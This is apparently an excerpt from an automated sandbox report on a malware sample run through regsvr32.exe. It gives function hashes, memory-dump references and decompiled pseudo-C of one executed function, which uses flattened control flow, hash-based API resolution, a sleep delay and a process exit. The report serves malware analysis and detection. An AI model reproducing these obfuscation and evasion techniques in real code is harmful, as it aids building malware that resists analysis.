                                                                                                                                                        • Instruction Fuzzy Hash: 7711C4B3F28F0381F6549DA8D96537D00456F6537CF180634E56E076FEFE2CA8604206
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696B7A70, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                        • String ID: U
                                                                                                                                                        • API String ID: 2456169464-4171548499
                                                                                                                                                        • Opcode ID: b5084150eb67580d74e1b1bfb1a9dead132afb2bb610794a3f29d912fcb56e88
                                                                                                                                                        • Instruction ID: b11b107672e1efa3b26765db16306f3946a1f6d6793ae469efab549a590919c8
                                                                                                                                                        • Opcode Fuzzy Hash: b5084150eb67580d74e1b1bfb1a9dead132afb2bb610794a3f29d912fcb56e88
                                                                                                                                                        • Instruction Fuzzy Hash: 8241A562B18B41C2E7609F95E8643BA77A0F788798F444131EE4D87B98EF3CD551CB01
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696ABEDA, Relevance: 6.2, APIs: 4, Instructions: 198filememoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocCreateDataDragFileFolderKeyboardLayoutNameObjectParentPathQuerySpecialVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1406883270-0
                                                                                                                                                        • Opcode ID: 725e035966592d2c45e170ddb7479a26060cc2404dd28b925ec76090a95935b3
                                                                                                                                                        • Instruction ID: d5d633498ea3686c539109be5266fce7512953446a78714ff3b70e213ca0ceb7
                                                                                                                                                        • Opcode Fuzzy Hash: 725e035966592d2c45e170ddb7479a26060cc2404dd28b925ec76090a95935b3
                                                                                                                                                        • Instruction Fuzzy Hash: 6291AC72608B81CBD720CF99E45065EBBA1F7857A8F50812AEB9947B98DF3DD445CF00
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696B7CE4, Relevance: 6.2, APIs: 4, Instructions: 191COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                        • Opcode ID: 5a0dc2dadbac4b4fb22eb1debfa3e6752830b29a8bcf083caaca6ad8de4bf4da
                                                                                                                                                        • Instruction ID: 8cfab83f06eb0a2be491e35240006dbd55c3152e9c652b7c62f499028ca526b7
                                                                                                                                                        • Opcode Fuzzy Hash: 5a0dc2dadbac4b4fb22eb1debfa3e6752830b29a8bcf083caaca6ad8de4bf4da
                                                                                                                                                        • Instruction Fuzzy Hash: AB71E7A2F18F56C5FB619FA194616BD66A4BF4478CF404435CE0E17B89FE3CA866C302
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696B1E20, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FFD696B1E52
                                                                                                                                                          • Part of subcall function 00007FFD696B27EC: HeapFree.KERNEL32(?,?,?,00007FFD696B250C,?,?,?,00007FFD696B2201,?,?,00000000,00007FFD696B25A9), ref: 00007FFD696B2802
                                                                                                                                                          • Part of subcall function 00007FFD696B27EC: GetLastError.KERNEL32(?,?,?,00007FFD696B250C,?,?,?,00007FFD696B2201,?,?,00000000,00007FFD696B25A9), ref: 00007FFD696B2814
                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFD696AFF48,?,?,?,?,00007FFD696AF9B8), ref: 00007FFD696B1E75
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                        • String ID: C:\Windows\system32\regsvr32.exe
                                                                                                                                                        • API String ID: 3580290477-464481000
                                                                                                                                                        • Opcode ID: db3623a733feb5ff7c332aad513bc24b6125415b98d7a0f7b4b3a9d20009dae2
                                                                                                                                                        • Instruction ID: 87272f7ee10941e971cb3b374ad3e41e05c322b6f2b96c1890b0553ad375b328
                                                                                                                                                        • Opcode Fuzzy Hash: db3623a733feb5ff7c332aad513bc24b6125415b98d7a0f7b4b3a9d20009dae2
                                                                                                                                                        • Instruction Fuzzy Hash: 2C4192B6B08F52D6EB15EFA598610B867A8EF447C8B554035EA4D43749EF3CE462C302
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696B4D9C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileHandleType
                                                                                                                                                        • String ID: @
                                                                                                                                                        • API String ID: 3000768030-2766056989
                                                                                                                                                        • Opcode ID: 1a7c81bc1cc84bf5c8542ecc2e2936191920317332852d552664a12fc3575f30
                                                                                                                                                        • Instruction ID: 831375761b56c904a26ac76bb6bcb719336bd9a9a3e3e57697c79588c645a2cb
                                                                                                                                                        • Opcode Fuzzy Hash: 1a7c81bc1cc84bf5c8542ecc2e2936191920317332852d552664a12fc3575f30
                                                                                                                                                        • Instruction Fuzzy Hash: CE21B1A2B1CF52C0EB608F6994A01382790EB45778F681335D6AE077D8EF78D892C342
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696B4AD0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Stringtry_get_function
                                                                                                                                                        • String ID: LCMapStringEx
                                                                                                                                                        • API String ID: 2588686239-3893581201
                                                                                                                                                        • Opcode ID: 549be689c052177796702d2ccb7cb8522ba696e8d4131ec1c979722215975df9
                                                                                                                                                        • Instruction ID: 2bd528bfc23e2535f19ee88969a93da42dd76b4d8acdc7412ad1777d8aa56ae1
                                                                                                                                                        • Opcode Fuzzy Hash: 549be689c052177796702d2ccb7cb8522ba696e8d4131ec1c979722215975df9
                                                                                                                                                        • Instruction Fuzzy Hash: 0D112772B08B81C6DB60DF86B4502AAB7A0FBC9B94F544136EA8D83B19DF3CD4508B40
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696B4A6C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                                                                        • String ID: InitializeCriticalSectionEx
                                                                                                                                                        • API String ID: 539475747-3084827643
                                                                                                                                                        • Opcode ID: 266232fc4c8e39fa3a10ea22fc72d84918e9a8bc9f16129e9982703793ee10e6
                                                                                                                                                        • Instruction ID: d539422e18cd77a0ef9b223c3b837eef64b86e370f6672dc759a7ce676482111
                                                                                                                                                        • Opcode Fuzzy Hash: 266232fc4c8e39fa3a10ea22fc72d84918e9a8bc9f16129e9982703793ee10e6
                                                                                                                                                        • Instruction Fuzzy Hash: 05F0BE65B08F91C1EA14AFC1B4604A932A0AF88B98F444032E90D03B1CDF7CE4A5C342
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696B4A18, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 00007FFD696B4A41
                                                                                                                                                        • TlsSetValue.KERNEL32(?,?,00000040,00007FFD696B2FD7,?,?,00000040,00007FFD696B34DD,?,?,?,?,00007FFD696B2811,?,?,?), ref: 00007FFD696B4A58
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Valuetry_get_function
                                                                                                                                                        • String ID: FlsSetValue
                                                                                                                                                        • API String ID: 738293619-3750699315
                                                                                                                                                        • Opcode ID: 697c96f5e6a3aa321d3cea161e2a4ac8245c8a2ccd7d854e69616932ef727f1f
                                                                                                                                                        • Instruction ID: ff406acfe9751aea6db90b88ae99e9243cfbc63fb4af82d70915326d942fbdc1
                                                                                                                                                        • Opcode Fuzzy Hash: 697c96f5e6a3aa321d3cea161e2a4ac8245c8a2ccd7d854e69616932ef727f1f
                                                                                                                                                        • Instruction Fuzzy Hash: 25E065A1B08F42D1EE04AFD1F4605B53362EF48798F495036E91D07259DE7CE4A5C302
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696B4BAC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DownlevelLocaleName__crttry_get_function
                                                                                                                                                        • String ID: LocaleNameToLCID
                                                                                                                                                        • API String ID: 404522899-2050040251
                                                                                                                                                        • Opcode ID: 0abeedad7c0bf5e17f69596c0581b251e9764620ab500febe9ab44f28993061f
                                                                                                                                                        • Instruction ID: 25a7b32a6b58a3481e7973798f5ac28d53707146496715d19d56d75185667d95
                                                                                                                                                        • Opcode Fuzzy Hash: 0abeedad7c0bf5e17f69596c0581b251e9764620ab500febe9ab44f28993061f
                                                                                                                                                        • Instruction Fuzzy Hash: D9E06D65B0CF02C1EA05AFD0B8701B83261AF84748F595032E61D0729AEF7CF8A68342
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Analysis Process: regsvr32.exe PID: 5712 Parent PID: 6980 regsvr32.exeCOMMON

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 005D02A4, Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 542COMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                                        			E005D02A4(void* __ebx, void* __ecx, void* __edx, signed int __esi, signed long long __rax, signed long long __rcx, char* __r8, void* __r9, void* __r11) {
				signed long long _v72;
				void* _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed long long _v104;
				void* _v112;
				signed long long _v120;
				intOrPtr _v124;
				signed long long _v136;
				signed int _v140;
				signed int _v144;
				intOrPtr _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _t111;
				void* _t115;
				void* _t197;
				signed int _t201;
				void* _t258;
				void* _t268;
				signed int _t269;
				signed int _t271;
				signed long long _t283;
				long long* _t284;
				long long* _t285;
				char* _t290;
				signed long long _t292;
				void* _t305;
				void* _t306;

				_t306 = __r11;
				_t305 = __r9;
				_t304 = __r8;
				_t292 = __rcx;
				_t283 = __rax;
				_t269 = __esi;
				_t197 = __ebx;
				_t290 = __r8;
				_t271 =  ==  ? 0xf29a3544 : 0x9fd7756b;
				r14d = 0x701b759;
				_t258 =  ==  ? r14d : 0xd9502225;
				_v84 = 0xd9502225;
				_t200 =  ==  ? 0xf29a3544 : 0xd4e563f;
				_v88 =  ==  ? 0xf29a3544 : 0xd4e563f;
				_t109 =  ==  ? r14d : 0xa912c783;
				_v92 =  ==  ? r14d : 0xa912c783;
				r15d = 0xda537fa7;
				r15d =  ==  ? 0x170b999c : r15d;
				_t111 = 0xca288c41;
				_t268 = 0x79849ae;
				while(1) {
					L1:
					_v120 = _t292;
					while(1) {
						L2:
						_t201 = _t111;
						if(_t111 > 0xf29a3543) {
							goto L10;
						}
						L3:
						if(_t201 <= 0xb0b3b625) {
							__eflags = _t201 - 0x93c76e2c;
							if(_t201 > 0x93c76e2c) {
								__eflags = _t201 - 0x9fd7756a;
								if(_t201 > 0x9fd7756a) {
									__eflags = _t201 - 0x9fd7756b;
									if(_t201 == 0x9fd7756b) {
										E005CCDB9(0x30, _t283);
										_v104 = _t283;
										_t284 = _v104;
										_v112 = _t284;
										r8d = 0x18d1ea71;
										r9d = 0x2b;
										E005CFAD7(1, _t269, _t284, _t292);
										 *_t284();
										_t285 =  *[gs:0x60];
										r8d = 0x27c2b783;
										r9d = 0xd;
										E005CFAD7(1, _t269, _t285, _t292);
										r8d = 0x30;
										_t299 = _v112;
										r14d = 0x701b759;
										 *_t285();
										_t292 = 0x5d02a4;
										_t283 =  *((intOrPtr*)(_v112 + 0x18)) + 0x5d02a4;
										_v72 = _t283;
										__eflags =  *((intOrPtr*)(_t285 + 0x10)) - 0x5d02a4;
										_t268 = 0x79849ae;
										_t111 =  >  ? 0xb0b3b626 : 0x2f0fb31e;
									} else {
										__eflags = _t201 - 0xa1a997a0;
										if(_t201 == 0xa1a997a0) {
											_v144 = r13d;
											__eflags = _v144 - 0x1520f;
											_t111 =  <  ? 0xea392f63 : 0x859994e5;
										} else {
											_t111 = _t201;
											__eflags = _t201 - 0xa912c783;
											if(_t201 == 0xa912c783) {
												__eflags =  *_t290;
												_t111 =  ==  ? r14d : 0x170b999c;
											}
										}
									}
									while(1) {
										L2:
										_t201 = _t111;
										if(_t111 > 0xf29a3543) {
											goto L10;
										}
										goto L3;
									}
								}
								__eflags = _t201 - 0x93c76e2d;
								if(_t201 == 0x93c76e2d) {
									_t292 = _v136;
									E005CA4E4(_t292);
									L107:
									_t111 = 0xb42b969a;
									while(1) {
										L2:
										_t201 = _t111;
										if(_t111 > 0xf29a3543) {
											goto L10;
										}
										goto L3;
									}
									goto L10;
								}
								__eflags = _t201 - 0x945c137a;
								if(_t201 == 0x945c137a) {
									goto L107;
								} else {
									_t111 = _t201;
									__eflags = _t201 - 0x9a2c0e1f;
									if(_t201 == 0x9a2c0e1f) {
										r13d = _v144;
										r13d = r13d + 3;
										_t111 = 0xa1a997a0;
									}
									continue;
								}
							}
							__eflags = _t201 - 0x859994e4;
							if(_t201 > 0x859994e4) {
								__eflags = _t201 - 0x859994e5;
								if(_t201 == 0x859994e5) {
									__eflags = _v152 + _v164 + _v156 - 0xf302e;
									_t111 =  ==  ? 0x6dc18416 : 0x2e98952d;
									continue;
								}
								__eflags = _t201 - 0x91685319;
								if(_t201 == 0x91685319) {
									_t111 = 0xbe5a0f3f;
									continue;
								}
								_t111 = _t201;
								__eflags = _t201 - 0x91ac664b;
								if(_t201 != 0x91ac664b) {
									continue;
								}
								_t292 = _v136;
								__eflags = E005CA8E0(_t292);
								_t115 = 0x51fb7187;
								L112:
								_t111 =  !=  ? 0xb42b969a : _t115;
								continue;
							}
							__eflags = _t201 - 0x834d46ed;
							if(_t201 == 0x834d46ed) {
								_v152 = (_v156 + 0xfffffffc) * _v164 - _v144 * _v140;
								_v164 = _t292 + _t283 * 2 - _v140 + 0xfffffc19;
								_t262 =  ~(_v152 + _v164) * _v156;
								_v156 = _t292 + _t292 * 2 + _t283 + _t292 * 8 +  ~(_v152 + _v164) * _v156;
								r12d = _v140;
								r12d = r12d + 5;
								_t111 = 0x34527dc1;
								continue;
							}
							__eflags = _t201 - 0x843901b2;
							if(_t201 == 0x843901b2) {
								__eflags = _v148 - 4;
								_t111 =  <  ? 0xe4701c02 : 0x13aae927;
								continue;
							}
							_t111 = _t201;
							__eflags = _t201 - 0x854a966f;
							if(_t201 == 0x854a966f) {
								return _t111;
							} else {
								continue;
							}
						}
						if(_t201 > 0xca288c40) {
							__eflags = _t201 - 0xe4701c01;
							if(_t201 > 0xe4701c01) {
								__eflags = _t201 - 0xe4701c02;
								if(_t201 == 0xe4701c02) {
									__eflags = _v148 - 2;
									_t111 =  <  ? _t268 : 0x91685319;
									continue;
								}
								__eflags = _t201 - 0xea392f63;
								if(_t201 == 0xea392f63) {
									_t111 = 0x34527dc1;
									r12d = 0;
									continue;
								}
								_t111 = _t201;
								__eflags = _t201 - 0xeb6755e2;
								if(_t201 != 0xeb6755e2) {
									continue;
								}
								__eflags = _v148 - 4;
								L96:
								_t111 =  ==  ? _t268 : 0x91685319;
							} else {
								_t111 = r15d;
								__eflags = _t201 - 0xca288c41;
								if(_t201 != 0xca288c41) {
									__eflags = _t201 - 0xd9502225;
									if(_t201 == 0xd9502225) {
										 *_t290 = 0;
										_t111 = 0x701b759;
									} else {
										_t111 = _t201;
										__eflags = _t201 - 0xda537fa7;
										if(_t201 == 0xda537fa7) {
											_t111 = _v92;
										}
									}
								}
							}
							continue;
						}
						if(_t201 > 0xc10a918e) {
							__eflags = _t201 - 0xc10a918f;
							if(_t201 == 0xc10a918f) {
								__eflags = _v148 - 8;
								goto L96;
							}
							__eflags = _t201 - 0xc7704248;
							if(_t201 == 0xc7704248) {
								__eflags = _v160 - 8;
								_t111 =  ==  ? 0x93c76e2d : 0x945c137a;
							} else {
								_t111 = _t201;
								__eflags = _t201 - 0xc88989fd;
								if(_t201 == 0xc88989fd) {
									_t283 = _v80;
									_v160 =  *_t283;
									_t111 = 0x7c8c10e9;
								}
							}
							continue;
						}
						if(_t201 <= 0xbe5a0f3e) {
							__eflags = _t201 - 0xb0b3b626;
							if(_t201 != 0xb0b3b626) {
								_t111 = _t201;
								__eflags = _t201 - 0xb42b969a;
								if(_t201 != 0xb42b969a) {
									continue;
								}
								E005C3998(_v136);
								E005D0C45(); // executed
								__eflags = 0;
								ExitProcess();
							}
							_v120 = _t283;
							r8d = 0x30;
							E005CC8BC(0, _t283, _v104, _t304, _t306);
							_t262 = 1;
							r8d = 0x27c2b783;
							r9d = 0xd;
							E005CFAD7(1, _t269, _t283, _v104);
							r8d = 0x30;
							_t292 = 0x5d02a4;
							_t299 = _v112;
							_t268 = 0x79849ae;
							 *_t283();
							_t283 = _v112;
							__eflags =  *((intOrPtr*)(_t283 + 0x28)) - 0x1000000;
							_t111 =  ==  ? 0x48479475 : 0x27daf151;
						} else {
							if(_t201 == 0xbe5a0f3f) {
								_t111 = 0x63da8ac0;
								_v124 = 0x3e8;
							} else {
								_t111 = _t201;
								if(_t201 == 0xbf82bb62) {
									_t111 =  ==  ? 0x91ac664b : 0x945c137a;
								}
							}
						}
						continue;
						L10:
						__eflags = _t201 - 0x2e98952c;
						if(_t201 > 0x2e98952c) {
							__eflags = _t201 - 0x5c545ed3;
							if(_t201 > 0x5c545ed3) {
								__eflags = _t201 - 0x7c8c10e8;
								if(_t201 > 0x7c8c10e8) {
									__eflags = _t201 - 0x7c8c10e9;
									if(_t201 == 0x7c8c10e9) {
										__eflags = _v160 - 2;
										_t111 =  <  ? 0x537690ef : 0xe1b9813;
										continue;
									}
									__eflags = _t201 - 0x7d4a3cd4;
									if(_t201 == 0x7d4a3cd4) {
										_t292 = _v136;
										__eflags = E005CA504(_t262, _t268, _t271, _t283, _t292, _t305);
										_t115 = 0x91ac664b;
										goto L112;
									}
									_t111 = _t201;
									__eflags = _t201 - 0x7da7801f;
									if(_t201 == 0x7da7801f) {
										__eflags = _v160;
										_t111 =  ==  ? 0x51fb7187 : 0x945c137a;
									}
									continue;
								}
								__eflags = _t201 - 0x5c545ed4;
								if(_t201 == 0x5c545ed4) {
									_t262 = 1;
									r8d = 0x510b3a3e;
									r9d = 0x5c;
									E005CFAD7(1, _t269, _t283, _t292);
									 *_t283();
									_t111 = 0xc88989fd;
								} else {
									__eflags = _t201 - 0x63da8ac0;
									if(_t201 == 0x63da8ac0) {
										r8d = 0x9d3c7b7a;
										r9d = 0xb2;
										E005CFAD7(1, _t269, _t283, _t292);
										SleepEx(??, ??); // executed
										_t262 = 0x20;
										E005C9F06(0x20, _t269, _v136, _t299, _t304, _t306);
										_t299 = _v136 + _t283;
										_t292 = _v136 + _t283;
										__eflags = E005C3A22(_t283, _t292, _v136 + _t283);
										_t111 =  !=  ? 0x5c545ed4 : 0xc88989fd;
									} else {
										_t111 = _t201;
										__eflags = _t201 - 0x6dc18416;
										if(_t201 == 0x6dc18416) {
											_v152 = _v152 + _v164 - (_v156 << 4);
											_v164 = _v156 + _t292 + _t292 * 2 + 0xffffffb3;
											_t111 = 0x2e98952d;
										}
									}
								}
								continue;
							}
							__eflags = _t201 - 0x48479474;
							if(_t201 > 0x48479474) {
								__eflags = _t201 - 0x48479475;
								if(_t201 == 0x48479475) {
									_t111 = 0x27daf151;
									while(1) {
										L1:
										_v120 = _t292;
										goto L2;
									}
								}
								__eflags = _t201 - 0x51fb7187;
								if(_t201 == 0x51fb7187) {
									_t292 = _v136;
									E005CC32D(_t262, _t283, _t292, _t306);
									goto L107;
								}
								_t111 = _t201;
								__eflags = _t201 - 0x537690ef;
								if(_t201 == 0x537690ef) {
									__eflags = _v160;
									_t111 =  <=  ? 0x7da7801f : 0x7d4a3cd4;
								}
								continue;
							}
							__eflags = _t201 - 0x2e98952d;
							if(_t201 == 0x2e98952d) {
								E005CCDB9(0xc40, _t283);
								_v136 = _t283;
								_t292 = _v136;
								_t262 = 0x10;
								E005C9F06(0x10, _t269, _t292, _t299, _t304, _t306);
								_v80 = _v136 + _t292;
								_t283 = _v80;
								_v148 =  *_t283;
								_t111 = 0x843901b2;
								continue;
							}
							__eflags = _t201 - 0x2f0fb31e;
							if(_t201 == 0x2f0fb31e) {
								_t283 = _v72;
								_t292 = 0x5d02a4;
								__eflags = _t283 - 0x5d02a4;
								_t111 =  <  ? 0xb0b3b626 : 0x27daf151;
								goto L1;
							} else {
								_t111 = _t201;
								__eflags = _t201 - 0x34527dc1;
								if(_t201 == 0x34527dc1) {
									_v140 = r12d;
									__eflags = _v140 - 0x2b4;
									_t111 =  <  ? 0x834d46ed : 0x9a2c0e1f;
								}
								continue;
							}
						}
						__eflags = _t201 - 0x13aae926;
						if(_t201 > 0x13aae926) {
							__eflags = _t201 - 0x18cf248b;
							if(_t201 > 0x18cf248b) {
								__eflags = _t201 - 0x18cf248c;
								if(_t201 == 0x18cf248c) {
									__eflags = _v160 - 0x40;
									_t111 =  ==  ? 0x187c6430 : 0x945c137a;
								} else {
									__eflags = _t201 - 0x27daf151;
									if(_t201 == 0x27daf151) {
										E005CCC2E(_t283, _v104);
										_t111 = 0xf29a3544;
										_t292 = _v120;
										_t269 = _t201;
									} else {
										_t111 = _t201;
										__eflags = _t201 - 0x28c5e58b;
										if(_t201 == 0x28c5e58b) {
											r13d = 0;
											_v152 = r13d;
											_v164 = r13d;
											_v156 = r13d;
											_t111 = 0xa1a997a0;
										}
									}
								}
								continue;
							}
							__eflags = _t201 - 0x13aae927;
							if(_t201 == 0x13aae927) {
								__eflags = _v148 - 8;
								_t111 =  <  ? 0xeb6755e2 : 0xc10a918f;
								continue;
							}
							__eflags = _t201 - 0x170b999c;
							if(__eflags == 0) {
								E005CFC4D(_t197, _t262, _t268, _t269, __eflags, _t283, _t292, _t304, _t305, _t306);
								_t111 = _v84;
								continue;
							}
